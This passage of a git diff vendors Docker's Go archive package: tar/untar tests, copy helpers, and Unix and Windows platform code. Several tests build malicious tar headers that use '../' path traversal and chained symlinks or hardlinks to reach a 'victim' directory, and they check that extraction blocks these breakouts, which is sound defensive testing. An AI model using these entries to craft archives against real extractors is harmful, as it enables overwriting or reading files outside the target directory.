TestCopyWithTarInexistentDestWillCreateIt(t *testing.T) { + tempFolder, err := ioutil.TempDir("", "docker-archive-test") + if err != nil { + t.Fatal(nil) + } + srcFolder := filepath.Join(tempFolder, "src") + inexistentDestFolder := filepath.Join(tempFolder, "doesnotexists") + err = os.MkdirAll(srcFolder, 0740) + if err != nil { + t.Fatal(err) + } + err = CopyWithTar(srcFolder, inexistentDestFolder) + if err != nil { + t.Fatalf("CopyWithTar with an inexistent folder shouldn't fail.") + } + _, err = os.Stat(inexistentDestFolder) + if err != nil { + t.Fatalf("CopyWithTar with an inexistent folder should create it.") + } +} + +// Test CopyWithTar with a file as src +func TestCopyWithTarSrcFile(t *testing.T) { + folder, err := ioutil.TempDir("", "docker-archive-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(folder) + dest := filepath.Join(folder, "dest") + 
srcFolder := filepath.Join(folder, "src") + src := filepath.Join(folder, filepath.Join("src", "src")) + err = os.MkdirAll(srcFolder, 0740) + if err != nil { + t.Fatal(err) + } + err = os.MkdirAll(dest, 0740) + if err != nil { + t.Fatal(err) + } + ioutil.WriteFile(src, []byte("content"), 0777) + err = CopyWithTar(src, dest) + if err != nil { + t.Fatalf("archiver.CopyWithTar shouldn't throw an error, %s.", err) + } + _, err = os.Stat(dest) + // FIXME Check the content + if err != nil { + t.Fatalf("Destination file should be the same as the source.") + } +} + +// Test CopyWithTar with a folder as src +func TestCopyWithTarSrcFolder(t *testing.T) { + folder, err := ioutil.TempDir("", "docker-archive-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(folder) + dest := filepath.Join(folder, "dest") + src := filepath.Join(folder, filepath.Join("src", "folder")) + err = os.MkdirAll(src, 0740) + if err != nil { + t.Fatal(err) + } + err = os.MkdirAll(dest, 0740) + if err != nil { + t.Fatal(err) + } + ioutil.WriteFile(filepath.Join(src, "file"), []byte("content"), 0777) + err = CopyWithTar(src, dest) + if err != nil { + t.Fatalf("archiver.CopyWithTar shouldn't throw an error, %s.", err) + } + _, err = os.Stat(dest) + // FIXME Check the content (the file inside) + if err != nil { + t.Fatalf("Destination folder should contain the source file but did not.") + } +} + +func TestCopyFileWithTarInvalidSrc(t *testing.T) { + tempFolder, err := ioutil.TempDir("", "docker-archive-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tempFolder) + destFolder := filepath.Join(tempFolder, "dest") + err = os.MkdirAll(destFolder, 0740) + if err != nil { + t.Fatal(err) + } + invalidFile := filepath.Join(tempFolder, "doesnotexists") + err = CopyFileWithTar(invalidFile, destFolder) + if err == nil { + t.Fatalf("archiver.CopyWithTar with invalid src path should throw an error.") + } +} + +func TestCopyFileWithTarInexistentDestWillCreateIt(t *testing.T) { + tempFolder, err 
:= ioutil.TempDir("", "docker-archive-test") + if err != nil { + t.Fatal(nil) + } + defer os.RemoveAll(tempFolder) + srcFile := filepath.Join(tempFolder, "src") + inexistentDestFolder := filepath.Join(tempFolder, "doesnotexists") + _, err = os.Create(srcFile) + if err != nil { + t.Fatal(err) + } + err = CopyFileWithTar(srcFile, inexistentDestFolder) + if err != nil { + t.Fatalf("CopyWithTar with an inexistent folder shouldn't fail.") + } + _, err = os.Stat(inexistentDestFolder) + if err != nil { + t.Fatalf("CopyWithTar with an inexistent folder should create it.") + } + // FIXME Test the src file and content +} + +func TestCopyFileWithTarSrcFolder(t *testing.T) { + folder, err := ioutil.TempDir("", "docker-archive-copyfilewithtar-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(folder) + dest := filepath.Join(folder, "dest") + src := filepath.Join(folder, "srcfolder") + err = os.MkdirAll(src, 0740) + if err != nil { + t.Fatal(err) + } + err = os.MkdirAll(dest, 0740) + if err != nil { + t.Fatal(err) + } + err = CopyFileWithTar(src, dest) + if err == nil { + t.Fatalf("CopyFileWithTar should throw an error with a folder.") + } +} + +func TestCopyFileWithTarSrcFile(t *testing.T) { + folder, err := ioutil.TempDir("", "docker-archive-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(folder) + dest := filepath.Join(folder, "dest") + srcFolder := filepath.Join(folder, "src") + src := filepath.Join(folder, filepath.Join("src", "src")) + err = os.MkdirAll(srcFolder, 0740) + if err != nil { + t.Fatal(err) + } + err = os.MkdirAll(dest, 0740) + if err != nil { + t.Fatal(err) + } + ioutil.WriteFile(src, []byte("content"), 0777) + err = CopyWithTar(src, dest+"/") + if err != nil { + t.Fatalf("archiver.CopyFileWithTar shouldn't throw an error, %s.", err) + } + _, err = os.Stat(dest) + if err != nil { + t.Fatalf("Destination folder should contain the source file but did not.") + } +} + +func TestTarFiles(t *testing.T) { + // TODO Windows: Figure out 
how to port this test. + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + // try without hardlinks + if err := checkNoChanges(1000, false); err != nil { + t.Fatal(err) + } + // try with hardlinks + if err := checkNoChanges(1000, true); err != nil { + t.Fatal(err) + } +} + +func checkNoChanges(fileNum int, hardlinks bool) error { + srcDir, err := ioutil.TempDir("", "docker-test-srcDir") + if err != nil { + return err + } + defer os.RemoveAll(srcDir) + + destDir, err := ioutil.TempDir("", "docker-test-destDir") + if err != nil { + return err + } + defer os.RemoveAll(destDir) + + _, err = prepareUntarSourceDirectory(fileNum, srcDir, hardlinks) + if err != nil { + return err + } + + err = TarUntar(srcDir, destDir) + if err != nil { + return err + } + + changes, err := ChangesDirs(destDir, srcDir) + if err != nil { + return err + } + if len(changes) > 0 { + return fmt.Errorf("with %d files and %v hardlinks: expected 0 changes, got %d", fileNum, hardlinks, len(changes)) + } + return nil +} + +func tarUntar(t *testing.T, origin string, options *TarOptions) ([]Change, error) { + archive, err := TarWithOptions(origin, options) + if err != nil { + t.Fatal(err) + } + defer archive.Close() + + buf := make([]byte, 10) + if _, err := archive.Read(buf); err != nil { + return nil, err + } + wrap := io.MultiReader(bytes.NewReader(buf), archive) + + detectedCompression := DetectCompression(buf) + compression := options.Compression + if detectedCompression.Extension() != compression.Extension() { + return nil, fmt.Errorf("Wrong compression detected. 
Actual compression: %s, found %s", compression.Extension(), detectedCompression.Extension()) + } + + tmp, err := ioutil.TempDir("", "docker-test-untar") + if err != nil { + return nil, err + } + defer os.RemoveAll(tmp) + if err := Untar(wrap, tmp, nil); err != nil { + return nil, err + } + if _, err := os.Stat(tmp); err != nil { + return nil, err + } + + return ChangesDirs(origin, tmp) +} + +func TestTarUntar(t *testing.T) { + // TODO Windows: Figure out how to fix this test. + if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + origin, err := ioutil.TempDir("", "docker-test-untar-origin") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(origin) + if err := ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700); err != nil { + t.Fatal(err) + } + if err := ioutil.WriteFile(filepath.Join(origin, "2"), []byte("welcome!"), 0700); err != nil { + t.Fatal(err) + } + if err := ioutil.WriteFile(filepath.Join(origin, "3"), []byte("will be ignored"), 0700); err != nil { + t.Fatal(err) + } + + for _, c := range []Compression{ + Uncompressed, + Gzip, + } { + changes, err := tarUntar(t, origin, &TarOptions{ + Compression: c, + ExcludePatterns: []string{"3"}, + }) + + if err != nil { + t.Fatalf("Error tar/untar for compression %s: %s", c.Extension(), err) + } + + if len(changes) != 1 || changes[0].Path != "/3" { + t.Fatalf("Unexpected differences after tarUntar: %v", changes) + } + } +} + +func TestTarWithOptions(t *testing.T) { + // TODO Windows: Figure out how to fix this test. 
+ if runtime.GOOS == "windows" { + t.Skip("Failing on Windows") + } + origin, err := ioutil.TempDir("", "docker-test-untar-origin") + if err != nil { + t.Fatal(err) + } + if _, err := ioutil.TempDir(origin, "folder"); err != nil { + t.Fatal(err) + } + defer os.RemoveAll(origin) + if err := ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700); err != nil { + t.Fatal(err) + } + if err := ioutil.WriteFile(filepath.Join(origin, "2"), []byte("welcome!"), 0700); err != nil { + t.Fatal(err) + } + + cases := []struct { + opts *TarOptions + numChanges int + }{ + {&TarOptions{IncludeFiles: []string{"1"}}, 2}, + {&TarOptions{ExcludePatterns: []string{"2"}}, 1}, + {&TarOptions{ExcludePatterns: []string{"1", "folder*"}}, 2}, + {&TarOptions{IncludeFiles: []string{"1", "1"}}, 2}, + {&TarOptions{IncludeFiles: []string{"1"}, RebaseNames: map[string]string{"1": "test"}}, 4}, + } + for _, testCase := range cases { + changes, err := tarUntar(t, origin, testCase.opts) + if err != nil { + t.Fatalf("Error tar/untar when testing inclusion/exclusion: %s", err) + } + if len(changes) != testCase.numChanges { + t.Errorf("Expected %d changes, got %d for %+v:", + testCase.numChanges, len(changes), testCase.opts) + } + } +} + +// Some tar archives such as http://haproxy.1wt.eu/download/1.5/src/devel/haproxy-1.5-dev21.tar.gz +// use PAX Global Extended Headers. +// Failing prevents the archives from being uncompressed during ADD +func TestTypeXGlobalHeaderDoesNotFail(t *testing.T) { + hdr := tar.Header{Typeflag: tar.TypeXGlobalHeader} + tmpDir, err := ioutil.TempDir("", "docker-test-archive-pax-test") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(tmpDir) + err = createTarFile(filepath.Join(tmpDir, "pax_global_header"), tmpDir, &hdr, nil, true, nil, false) + if err != nil { + t.Fatal(err) + } +} + +// Some tar have both GNU specific (huge uid) and Ustar specific (long name) things. 
+// Not supposed to happen (should use PAX instead of Ustar for long name) but it does and it should still work. +func TestUntarUstarGnuConflict(t *testing.T) { + f, err := os.Open("testdata/broken.tar") + if err != nil { + t.Fatal(err) + } + defer f.Close() + + found := false + tr := tar.NewReader(f) + // Iterate through the files in the archive. + for { + hdr, err := tr.Next() + if err == io.EOF { + // end of tar archive + break + } + if err != nil { + t.Fatal(err) + } + if hdr.Name == "root/.cpanm/work/1395823785.24209/Plack-1.0030/blib/man3/Plack::Middleware::LighttpdScriptNameFix.3pm" { + found = true + break + } + } + if !found { + t.Fatalf("%s not found in the archive", "root/.cpanm/work/1395823785.24209/Plack-1.0030/blib/man3/Plack::Middleware::LighttpdScriptNameFix.3pm") + } +} + +func prepareUntarSourceDirectory(numberOfFiles int, targetPath string, makeLinks bool) (int, error) { + fileData := []byte("fooo") + for n := 0; n < numberOfFiles; n++ { + fileName := fmt.Sprintf("file-%d", n) + if err := ioutil.WriteFile(filepath.Join(targetPath, fileName), fileData, 0700); err != nil { + return 0, err + } + if makeLinks { + if err := os.Link(filepath.Join(targetPath, fileName), filepath.Join(targetPath, fileName+"-link")); err != nil { + return 0, err + } + } + } + totalSize := numberOfFiles * len(fileData) + return totalSize, nil +} + +func BenchmarkTarUntar(b *testing.B) { + origin, err := ioutil.TempDir("", "docker-test-untar-origin") + if err != nil { + b.Fatal(err) + } + tempDir, err := ioutil.TempDir("", "docker-test-untar-destination") + if err != nil { + b.Fatal(err) + } + target := filepath.Join(tempDir, "dest") + n, err := prepareUntarSourceDirectory(100, origin, false) + if err != nil { + b.Fatal(err) + } + defer os.RemoveAll(origin) + defer os.RemoveAll(tempDir) + + b.ResetTimer() + b.SetBytes(int64(n)) + for n := 0; n < b.N; n++ { + err := TarUntar(origin, target) + if err != nil { + b.Fatal(err) + } + os.RemoveAll(target) + } +} + +func 
BenchmarkTarUntarWithLinks(b *testing.B) { + origin, err := ioutil.TempDir("", "docker-test-untar-origin") + if err != nil { + b.Fatal(err) + } + tempDir, err := ioutil.TempDir("", "docker-test-untar-destination") + if err != nil { + b.Fatal(err) + } + target := filepath.Join(tempDir, "dest") + n, err := prepareUntarSourceDirectory(100, origin, true) + if err != nil { + b.Fatal(err) + } + defer os.RemoveAll(origin) + defer os.RemoveAll(tempDir) + + b.ResetTimer() + b.SetBytes(int64(n)) + for n := 0; n < b.N; n++ { + err := TarUntar(origin, target) + if err != nil { + b.Fatal(err) + } + os.RemoveAll(target) + } +} + +func TestUntarInvalidFilenames(t *testing.T) { + // TODO Windows: Figure out how to fix this test. + if runtime.GOOS == "windows" { + t.Skip("Passes but hits breakoutError: platform and architecture is not supported") + } + for i, headers := range [][]*tar.Header{ + { + { + Name: "../victim/dotdot", + Typeflag: tar.TypeReg, + Mode: 0644, + }, + }, + { + { + // Note the leading slash + Name: "/../victim/slash-dotdot", + Typeflag: tar.TypeReg, + Mode: 0644, + }, + }, + } { + if err := testBreakout("untar", "docker-TestUntarInvalidFilenames", headers); err != nil { + t.Fatalf("i=%d. %v", i, err) + } + } +} + +func TestUntarHardlinkToSymlink(t *testing.T) { + // TODO Windows. There may be a way of running this, but turning off for now + if runtime.GOOS == "windows" { + t.Skip("hardlinks on Windows") + } + for i, headers := range [][]*tar.Header{ + { + { + Name: "symlink1", + Typeflag: tar.TypeSymlink, + Linkname: "regfile", + Mode: 0644, + }, + { + Name: "symlink2", + Typeflag: tar.TypeLink, + Linkname: "symlink1", + Mode: 0644, + }, + { + Name: "regfile", + Typeflag: tar.TypeReg, + Mode: 0644, + }, + }, + } { + if err := testBreakout("untar", "docker-TestUntarHardlinkToSymlink", headers); err != nil { + t.Fatalf("i=%d. %v", i, err) + } + } +} + +func TestUntarInvalidHardlink(t *testing.T) { + // TODO Windows. 
There may be a way of running this, but turning off for now + if runtime.GOOS == "windows" { + t.Skip("hardlinks on Windows") + } + for i, headers := range [][]*tar.Header{ + { // try reading victim/hello (../) + { + Name: "dotdot", + Typeflag: tar.TypeLink, + Linkname: "../victim/hello", + Mode: 0644, + }, + }, + { // try reading victim/hello (/../) + { + Name: "slash-dotdot", + Typeflag: tar.TypeLink, + // Note the leading slash + Linkname: "/../victim/hello", + Mode: 0644, + }, + }, + { // try writing victim/file + { + Name: "loophole-victim", + Typeflag: tar.TypeLink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "loophole-victim/file", + Typeflag: tar.TypeReg, + Mode: 0644, + }, + }, + { // try reading victim/hello (hardlink, symlink) + { + Name: "loophole-victim", + Typeflag: tar.TypeLink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "symlink", + Typeflag: tar.TypeSymlink, + Linkname: "loophole-victim/hello", + Mode: 0644, + }, + }, + { // Try reading victim/hello (hardlink, hardlink) + { + Name: "loophole-victim", + Typeflag: tar.TypeLink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "hardlink", + Typeflag: tar.TypeLink, + Linkname: "loophole-victim/hello", + Mode: 0644, + }, + }, + { // Try removing victim directory (hardlink) + { + Name: "loophole-victim", + Typeflag: tar.TypeLink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "loophole-victim", + Typeflag: tar.TypeReg, + Mode: 0644, + }, + }, + } { + if err := testBreakout("untar", "docker-TestUntarInvalidHardlink", headers); err != nil { + t.Fatalf("i=%d. %v", i, err) + } + } +} + +func TestUntarInvalidSymlink(t *testing.T) { + // TODO Windows. 
There may be a way of running this, but turning off for now + if runtime.GOOS == "windows" { + t.Skip("hardlinks on Windows") + } + for i, headers := range [][]*tar.Header{ + { // try reading victim/hello (../) + { + Name: "dotdot", + Typeflag: tar.TypeSymlink, + Linkname: "../victim/hello", + Mode: 0644, + }, + }, + { // try reading victim/hello (/../) + { + Name: "slash-dotdot", + Typeflag: tar.TypeSymlink, + // Note the leading slash + Linkname: "/../victim/hello", + Mode: 0644, + }, + }, + { // try writing victim/file + { + Name: "loophole-victim", + Typeflag: tar.TypeSymlink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "loophole-victim/file", + Typeflag: tar.TypeReg, + Mode: 0644, + }, + }, + { // try reading victim/hello (symlink, symlink) + { + Name: "loophole-victim", + Typeflag: tar.TypeSymlink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "symlink", + Typeflag: tar.TypeSymlink, + Linkname: "loophole-victim/hello", + Mode: 0644, + }, + }, + { // try reading victim/hello (symlink, hardlink) + { + Name: "loophole-victim", + Typeflag: tar.TypeSymlink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "hardlink", + Typeflag: tar.TypeLink, + Linkname: "loophole-victim/hello", + Mode: 0644, + }, + }, + { // try removing victim directory (symlink) + { + Name: "loophole-victim", + Typeflag: tar.TypeSymlink, + Linkname: "../victim", + Mode: 0755, + }, + { + Name: "loophole-victim", + Typeflag: tar.TypeReg, + Mode: 0644, + }, + }, + { // try writing to victim/newdir/newfile with a symlink in the path + { + // this header needs to be before the next one, or else there is an error + Name: "dir/loophole", + Typeflag: tar.TypeSymlink, + Linkname: "../../victim", + Mode: 0755, + }, + { + Name: "dir/loophole/newdir/newfile", + Typeflag: tar.TypeReg, + Mode: 0644, + }, + }, + } { + if err := testBreakout("untar", "docker-TestUntarInvalidSymlink", headers); err != nil { + t.Fatalf("i=%d. 
%v", i, err) + } + } +} + +func TestTempArchiveCloseMultipleTimes(t *testing.T) { + reader := ioutil.NopCloser(strings.NewReader("hello")) + tempArchive, err := NewTempArchive(reader, "") + buf := make([]byte, 10) + n, err := tempArchive.Read(buf) + if n != 5 { + t.Fatalf("Expected to read 5 bytes. Read %d instead", n) + } + for i := 0; i < 3; i++ { + if err = tempArchive.Close(); err != nil { + t.Fatalf("i=%d. Unexpected error closing temp archive: %v", i, err) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_unix.go b/vendor/github.com/docker/docker/pkg/archive/archive_unix.go new file mode 100644 index 0000000000..7083f2fa53 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/archive_unix.go @@ -0,0 +1,118 @@ +// +build !windows + +package archive + +import ( + "archive/tar" + "errors" + "os" + "path/filepath" + "syscall" + + "github.com/docker/docker/pkg/system" + rsystem "github.com/opencontainers/runc/libcontainer/system" +) + +// fixVolumePathPrefix does platform specific processing to ensure that if +// the path being passed in is not in a volume path format, convert it to one. +func fixVolumePathPrefix(srcPath string) string { + return srcPath +} + +// getWalkRoot calculates the root path when performing a TarWithOptions. +// We use a separate function as this is platform specific. On Linux, we +// can't use filepath.Join(srcPath,include) because this will clean away +// a trailing "." or "/" which may be important. +func getWalkRoot(srcPath string, include string) string { + return srcPath + string(filepath.Separator) + include +} + +// CanonicalTarNameForPath returns platform-specific filepath +// to canonical posix-style path for tar archival. p is relative +// path. +func CanonicalTarNameForPath(p string) (string, error) { + return p, nil // already unix-style +} + +// chmodTarEntry is used to adjust the file permissions used in tar header based +// on the platform the archival is done. 
+ +func chmodTarEntry(perm os.FileMode) os.FileMode { + return perm // noop for unix as golang APIs provide perm bits correctly +} + +func setHeaderForSpecialDevice(hdr *tar.Header, ta *tarAppender, name string, stat interface{}) (inode uint64, err error) { + s, ok := stat.(*syscall.Stat_t) + + if !ok { + err = errors.New("cannot convert stat value to syscall.Stat_t") + return + } + + inode = uint64(s.Ino) + + // Currently go does not fill in the major/minors + if s.Mode&syscall.S_IFBLK != 0 || + s.Mode&syscall.S_IFCHR != 0 { + hdr.Devmajor = int64(major(uint64(s.Rdev))) + hdr.Devminor = int64(minor(uint64(s.Rdev))) + } + + return +} + +func getFileUIDGID(stat interface{}) (int, int, error) { + s, ok := stat.(*syscall.Stat_t) + + if !ok { + return -1, -1, errors.New("cannot convert stat value to syscall.Stat_t") + } + return int(s.Uid), int(s.Gid), nil +} + +func major(device uint64) uint64 { + return (device >> 8) & 0xfff +} + +func minor(device uint64) uint64 { + return (device & 0xff) | ((device >> 12) & 0xfff00) +} + +// handleTarTypeBlockCharFifo is an OS-specific helper function used by +// createTarFile to handle the following types of header: Block; Char; Fifo +func handleTarTypeBlockCharFifo(hdr *tar.Header, path string) error { + if rsystem.RunningInUserNS() { + // cannot create a device if running in user namespace + return nil + } + + mode := uint32(hdr.Mode & 07777) + switch hdr.Typeflag { + case tar.TypeBlock: + mode |= syscall.S_IFBLK + case tar.TypeChar: + mode |= syscall.S_IFCHR + case tar.TypeFifo: + mode |= syscall.S_IFIFO + } + + if err := system.Mknod(path, mode, int(system.Mkdev(hdr.Devmajor, hdr.Devminor))); err != nil { + return err + } + return nil +} + +func handleLChmod(hdr *tar.Header, path string, hdrInfo os.FileInfo) error { + if hdr.Typeflag == tar.TypeLink { + if fi, err := os.Lstat(hdr.Linkname); err == nil && (fi.Mode()&os.ModeSymlink == 0) { + if err := os.Chmod(path, hdrInfo.Mode()); err != nil { + return err + } + } + } else if 
hdr.Typeflag != tar.TypeSymlink { + if err := os.Chmod(path, hdrInfo.Mode()); err != nil { + return err + } + } + return nil +} diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_unix_test.go b/vendor/github.com/docker/docker/pkg/archive/archive_unix_test.go new file mode 100644 index 0000000000..4eeafdd128 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/archive_unix_test.go @@ -0,0 +1,249 @@ +// +build !windows + +package archive + +import ( + "bytes" + "fmt" + "io/ioutil" + "os" + "path/filepath" + "runtime" + "syscall" + "testing" + + "github.com/docker/docker/pkg/system" +) + +func TestCanonicalTarNameForPath(t *testing.T) { + cases := []struct{ in, expected string }{ + {"foo", "foo"}, + {"foo/bar", "foo/bar"}, + {"foo/dir/", "foo/dir/"}, + } + for _, v := range cases { + if out, err := CanonicalTarNameForPath(v.in); err != nil { + t.Fatalf("cannot get canonical name for path: %s: %v", v.in, err) + } else if out != v.expected { + t.Fatalf("wrong canonical tar name. expected:%s got:%s", v.expected, out) + } + } +} + +func TestCanonicalTarName(t *testing.T) { + cases := []struct { + in string + isDir bool + expected string + }{ + {"foo", false, "foo"}, + {"foo", true, "foo/"}, + {"foo/bar", false, "foo/bar"}, + {"foo/bar", true, "foo/bar/"}, + } + for _, v := range cases { + if out, err := canonicalTarName(v.in, v.isDir); err != nil { + t.Fatalf("cannot get canonical name for path: %s: %v", v.in, err) + } else if out != v.expected { + t.Fatalf("wrong canonical tar name. expected:%s got:%s", v.expected, out) + } + } +} + +func TestChmodTarEntry(t *testing.T) { + cases := []struct { + in, expected os.FileMode + }{ + {0000, 0000}, + {0777, 0777}, + {0644, 0644}, + {0755, 0755}, + {0444, 0444}, + } + for _, v := range cases { + if out := chmodTarEntry(v.in); out != v.expected { + t.Fatalf("wrong chmod. 
expected:%v got:%v", v.expected, out) + } + } +} + +func TestTarWithHardLink(t *testing.T) { + origin, err := ioutil.TempDir("", "docker-test-tar-hardlink") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(origin) + if err := ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700); err != nil { + t.Fatal(err) + } + if err := os.Link(filepath.Join(origin, "1"), filepath.Join(origin, "2")); err != nil { + t.Fatal(err) + } + + var i1, i2 uint64 + if i1, err = getNlink(filepath.Join(origin, "1")); err != nil { + t.Fatal(err) + } + // sanity check that we can hardlink + if i1 != 2 { + t.Skipf("skipping since hardlinks don't work here; expected 2 links, got %d", i1) + } + + dest, err := ioutil.TempDir("", "docker-test-tar-hardlink-dest") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(dest) + + // we'll do this in two steps to separate failure + fh, err := Tar(origin, Uncompressed) + if err != nil { + t.Fatal(err) + } + + // ensure we can read the whole thing with no error, before writing back out + buf, err := ioutil.ReadAll(fh) + if err != nil { + t.Fatal(err) + } + + bRdr := bytes.NewReader(buf) + err = Untar(bRdr, dest, &TarOptions{Compression: Uncompressed}) + if err != nil { + t.Fatal(err) + } + + if i1, err = getInode(filepath.Join(dest, "1")); err != nil { + t.Fatal(err) + } + if i2, err = getInode(filepath.Join(dest, "2")); err != nil { + t.Fatal(err) + } + + if i1 != i2 { + t.Errorf("expected matching inodes, but got %d and %d", i1, i2) + } +} + +func getNlink(path string) (uint64, error) { + stat, err := os.Stat(path) + if err != nil { + return 0, err + } + statT, ok := stat.Sys().(*syscall.Stat_t) + if !ok { + return 0, fmt.Errorf("expected type *syscall.Stat_t, got %t", stat.Sys()) + } + // We need this conversion on ARM64 + return uint64(statT.Nlink), nil +} + +func getInode(path string) (uint64, error) { + stat, err := os.Stat(path) + if err != nil { + return 0, err + } + statT, ok := stat.Sys().(*syscall.Stat_t) + if 
!ok { + return 0, fmt.Errorf("expected type *syscall.Stat_t, got %t", stat.Sys()) + } + return statT.Ino, nil +} + +func TestTarWithBlockCharFifo(t *testing.T) { + origin, err := ioutil.TempDir("", "docker-test-tar-hardlink") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(origin) + if err := ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 0700); err != nil { + t.Fatal(err) + } + if err := system.Mknod(filepath.Join(origin, "2"), syscall.S_IFBLK, int(system.Mkdev(int64(12), int64(5)))); err != nil { + t.Fatal(err) + } + if err := system.Mknod(filepath.Join(origin, "3"), syscall.S_IFCHR, int(system.Mkdev(int64(12), int64(5)))); err != nil { + t.Fatal(err) + } + if err := system.Mknod(filepath.Join(origin, "4"), syscall.S_IFIFO, int(system.Mkdev(int64(12), int64(5)))); err != nil { + t.Fatal(err) + } + + dest, err := ioutil.TempDir("", "docker-test-tar-hardlink-dest") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(dest) + + // we'll do this in two steps to separate failure + fh, err := Tar(origin, Uncompressed) + if err != nil { + t.Fatal(err) + } + + // ensure we can read the whole thing with no error, before writing back out + buf, err := ioutil.ReadAll(fh) + if err != nil { + t.Fatal(err) + } + + bRdr := bytes.NewReader(buf) + err = Untar(bRdr, dest, &TarOptions{Compression: Uncompressed}) + if err != nil { + t.Fatal(err) + } + + changes, err := ChangesDirs(origin, dest) + if err != nil { + t.Fatal(err) + } + if len(changes) > 0 { + t.Fatalf("Tar with special device (block, char, fifo) should keep them (recreate them when untar) : %v", changes) + } +} + +// TestTarUntarWithXattr is Unix as Lsetxattr is not supported on Windows +func TestTarUntarWithXattr(t *testing.T) { + if runtime.GOOS == "solaris" { + t.Skip() + } + origin, err := ioutil.TempDir("", "docker-test-untar-origin") + if err != nil { + t.Fatal(err) + } + defer os.RemoveAll(origin) + if err := ioutil.WriteFile(filepath.Join(origin, "1"), []byte("hello world"), 
0700); err != nil { + t.Fatal(err) + } + if err := ioutil.WriteFile(filepath.Join(origin, "2"), []byte("welcome!"), 0700); err != nil { + t.Fatal(err) + } + if err := ioutil.WriteFile(filepath.Join(origin, "3"), []byte("will be ignored"), 0700); err != nil { + t.Fatal(err) + } + if err := system.Lsetxattr(filepath.Join(origin, "2"), "security.capability", []byte{0x00}, 0); err != nil { + t.Fatal(err) + } + + for _, c := range []Compression{ + Uncompressed, + Gzip, + } { + changes, err := tarUntar(t, origin, &TarOptions{ + Compression: c, + ExcludePatterns: []string{"3"}, + }) + + if err != nil { + t.Fatalf("Error tar/untar for compression %s: %s", c.Extension(), err) + } + + if len(changes) != 1 || changes[0].Path != "/3" { + t.Fatalf("Unexpected differences after tarUntar: %v", changes) + } + capability, _ := system.Lgetxattr(filepath.Join(origin, "2"), "security.capability") + if capability == nil && capability[0] != 0x00 { + t.Fatalf("Untar should have kept the 'security.capability' xattr.") + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_windows.go b/vendor/github.com/docker/docker/pkg/archive/archive_windows.go new file mode 100644 index 0000000000..5c3a1be340 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/archive_windows.go @@ -0,0 +1,70 @@ +// +build windows + +package archive + +import ( + "archive/tar" + "fmt" + "os" + "path/filepath" + "strings" + + "github.com/docker/docker/pkg/longpath" +) + +// fixVolumePathPrefix does platform specific processing to ensure that if +// the path being passed in is not in a volume path format, convert it to one. +func fixVolumePathPrefix(srcPath string) string { + return longpath.AddPrefix(srcPath) +} + +// getWalkRoot calculates the root path when performing a TarWithOptions. +// We use a separate function as this is platform specific. 
+func getWalkRoot(srcPath string, include string) string { + return filepath.Join(srcPath, include) +} + +// CanonicalTarNameForPath returns platform-specific filepath +// to canonical posix-style path for tar archival. p is relative +// path. +func CanonicalTarNameForPath(p string) (string, error) { + // windows: convert windows style relative path with backslashes + // into forward slashes. Since windows does not allow '/' or '\' + // in file names, it is mostly safe to replace however we must + // check just in case + if strings.Contains(p, "/") { + return "", fmt.Errorf("Windows path contains forward slash: %s", p) + } + return strings.Replace(p, string(os.PathSeparator), "/", -1), nil + +} + +// chmodTarEntry is used to adjust the file permissions used in tar header based +// on the platform the archival is done. +func chmodTarEntry(perm os.FileMode) os.FileMode { + perm &= 0755 + // Add the x bit: make everything +x from windows + perm |= 0111 + + return perm +} + +func setHeaderForSpecialDevice(hdr *tar.Header, ta *tarAppender, name string, stat interface{}) (inode uint64, err error) { + // do nothing. 
no notion of Rdev, Inode, Nlink in stat on Windows + return +} + +// handleTarTypeBlockCharFifo is an OS-specific helper function used by +// createTarFile to handle the following types of header: Block; Char; Fifo +func handleTarTypeBlockCharFifo(hdr *tar.Header, path string) error { + return nil +} + +func handleLChmod(hdr *tar.Header, path string, hdrInfo os.FileInfo) error { + return nil +} + +func getFileUIDGID(stat interface{}) (int, int, error) { + // no notion of file ownership mapping yet on Windows + return 0, 0, nil +} diff --git a/vendor/github.com/docker/docker/pkg/archive/archive_windows_test.go b/vendor/github.com/docker/docker/pkg/archive/archive_windows_test.go new file mode 100644 index 0000000000..0c6733d6bd --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/archive/archive_windows_test.go @@ -0,0 +1,91 @@ +// +build windows + +package archive + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" +) + +func TestCopyFileWithInvalidDest(t *testing.T) { + // TODO Windows: This is currently failing. Not sure what has + // recently changed in CopyWithTar as used to pass. Further investigation + // is required. 
